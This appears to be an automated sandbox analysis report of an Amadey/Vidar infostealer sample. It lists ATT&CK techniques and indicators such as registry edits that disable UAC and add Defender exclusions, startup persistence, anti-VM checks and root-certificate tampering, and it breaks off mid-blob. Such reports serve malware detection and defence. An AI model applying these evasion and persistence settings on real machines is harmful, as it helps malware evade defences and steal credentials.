amadey | 5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Windows security bypass 2 TTPs 2 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe = "0"	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6OHN4CyGcKVkwjvgqcvJp9Oo.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	OHTfxwtBUjCjxOLnw6jIdlPm.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6OHN4CyGcKVkwjvgqcvJp9Oo.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	ajMmiEpKM5OqZdh1nhJPx2rj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	nhdues.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation	HmT0NNXHZoHsOEX0qCOYE4NB.exe

Drops startup file 10 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5s22gXJcneW3p0Q4YKUaXZ9f.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kehMNjJyLuqnfVoIyOBIcsrh.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2ebA9vNQntRWrgWmexmF9unE.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0wMxTAMwT6gLVVCUpFAwbyBH.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\R618yS4m1qBo94mTrhhhsydd.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RbqMd6OftXv1DoThyVFxxYRz.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qXucm8j1xA5EvDrmFehXp4p9.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6ay28MFoMPcOUCccfn9CppxF.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X9dQltJBVcqgFZs41QUUxs22.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3dnuddyMYRyM1bE8ockn5YaY.bat	jsc.exe

Executes dropped EXE 29 IoCs

pid	Process
5112	ajMmiEpKM5OqZdh1nhJPx2rj.exe
2704	bTGe0ol3K0w3um7pskpHanHV.exe
2076	4spGpdCkGyZsyMiGix6d3PgZ.exe
4624	gEjNV46H1WJhZbR4oosHziet.exe
2204	0cWv8tEmnjqxIuo0CxEGJazK.exe
4188	nhdues.exe
3216	JwDLqh5ZmMP4J1Rtni6vkHbk.exe
1280	callcustomerpro.exe
4472	HmT0NNXHZoHsOEX0qCOYE4NB.exe
3120	callcustomer.exe
4376	OHTfxwtBUjCjxOLnw6jIdlPm.exe
1824	h7jqt6NA7XhdK3quV4edRunn.exe
1880	Bj9PEARBYxBKa3JbLohwrrkI.exe
4076	h7jqt6NA7XhdK3quV4edRunn.exe
4836	Bj9PEARBYxBKa3JbLohwrrkI.tmp
4360	h7jqt6NA7XhdK3quV4edRunn.exe
4080	h7jqt6NA7XhdK3quV4edRunn.exe
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
4956	CyHfsVAUgPHl3A20x2ColQBi.exe
4292	h7jqt6NA7XhdK3quV4edRunn.exe
1820	Install.exe
3104	_setup64.tmp
3536	Install.exe
3668	䔷湗瘸湣㝢穅㑣穆湆D
5108	DigitalPulseService.exe
5876	nhdues.exe
6088	callcustomer.exe
5836	calllcustomer.exe
5816	updater.exe

Loads dropped DLL 10 IoCs

pid	Process
1824	h7jqt6NA7XhdK3quV4edRunn.exe
4076	h7jqt6NA7XhdK3quV4edRunn.exe
4360	h7jqt6NA7XhdK3quV4edRunn.exe
4080	h7jqt6NA7XhdK3quV4edRunn.exe
4292	h7jqt6NA7XhdK3quV4edRunn.exe
4472	HmT0NNXHZoHsOEX0qCOYE4NB.exe
4472	HmT0NNXHZoHsOEX0qCOYE4NB.exe
5596	rundll32.exe
6116	rundll32.exe
3748	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 16 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x0006000000023267-226.dat	themida
behavioral2/files/0x0006000000023267-237.dat	themida
behavioral2/files/0x0006000000023267-236.dat	themida
behavioral2/memory/3844-245-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-251-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-252-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-253-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-254-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-255-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-256-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-257-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-259-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-260-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-387-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-436-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida
behavioral2/memory/3844-525-0x00007FF7AECC0000-0x00007FF7AFDBC000-memory.dmp	themida

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1824-184-0x0000000000E80000-0x00000000013CD000-memory.dmp	upx
behavioral2/files/0x000600000002324f-188.dat	upx
behavioral2/files/0x000600000002324f-173.dat	upx
behavioral2/files/0x000600000002324f-160.dat	upx
behavioral2/memory/4076-195-0x0000000000E80000-0x00000000013CD000-memory.dmp	upx
behavioral2/files/0x000600000002324f-200.dat	upx
behavioral2/files/0x0006000000023263-204.dat	upx
behavioral2/memory/4360-215-0x0000000000900000-0x0000000000E4D000-memory.dmp	upx
behavioral2/files/0x000600000002324f-235.dat	upx
behavioral2/files/0x000600000002324f-289.dat	upx
behavioral2/memory/4080-401-0x0000000000E80000-0x00000000013CD000-memory.dmp	upx
behavioral2/memory/4292-402-0x0000000000E80000-0x00000000013CD000-memory.dmp	upx
behavioral2/memory/3668-411-0x0000000000400000-0x0000000000476000-memory.dmp	upx
behavioral2/memory/3668-425-0x0000000000400000-0x0000000000476000-memory.dmp	upx
behavioral2/memory/3668-428-0x0000000000400000-0x0000000000476000-memory.dmp	upx
behavioral2/memory/3668-435-0x0000000000400000-0x0000000000476000-memory.dmp	upx
behavioral2/memory/3668-432-0x0000000000400000-0x0000000000476000-memory.dmp	upx

Windows security modification 2 TTPs 3 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe = "0"	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	4spGpdCkGyZsyMiGix6d3PgZ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	callcustomerpro.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DigitalPulse = "\"C:\\Users\\Admin\\AppData\\Roaming\\DigitalPulse\\DigitalPulseService.exe\" 5333:::clickId=:::srcId="	Bj9PEARBYxBKa3JbLohwrrkI.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6OHN4CyGcKVkwjvgqcvJp9Oo.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	h7jqt6NA7XhdK3quV4edRunn.exe
File opened (read-only)	\??\F:	h7jqt6NA7XhdK3quV4edRunn.exe
File opened (read-only)	\??\D:	h7jqt6NA7XhdK3quV4edRunn.exe
File opened (read-only)	\??\F:	h7jqt6NA7XhdK3quV4edRunn.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
119	api.myip.com
122	ipinfo.io
123	ipinfo.io
118	api.myip.com

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	6OHN4CyGcKVkwjvgqcvJp9Oo.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3844	6OHN4CyGcKVkwjvgqcvJp9Oo.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3696 set thread context of 1972	3696	5192b1aaa8f755f0a0dd96836ec80d4f208b0403ff3d755e9a112e7efb1ce68f.exe	92
PID 2704 set thread context of 3668	2704	schtasks.exe	122
PID 3120 set thread context of 6088	3120	callcustomer.exe	178

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	OHTfxwtBUjCjxOLnw6jIdlPm.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4656	sc.exe
6032	sc.exe
6008	sc.exe
5828	sc.exe
5204	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5784	4472	WerFault.exe	101
2656	4624	WerFault.exe	97

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	HmT0NNXHZoHsOEX0qCOYE4NB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	HmT0NNXHZoHsOEX0qCOYE4NB.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4552	schtasks.exe
5428	schtasks.exe
6068	schtasks.exe
2704	schtasks.exe
5360	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
856	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	h7jqt6NA7XhdK3quV4edRunn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	h7jqt6NA7XhdK3quV4edRunn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	h7jqt6NA7XhdK3quV4edRunn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	h7jqt6NA7XhdK3quV4edRunn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b3009060355040613025553311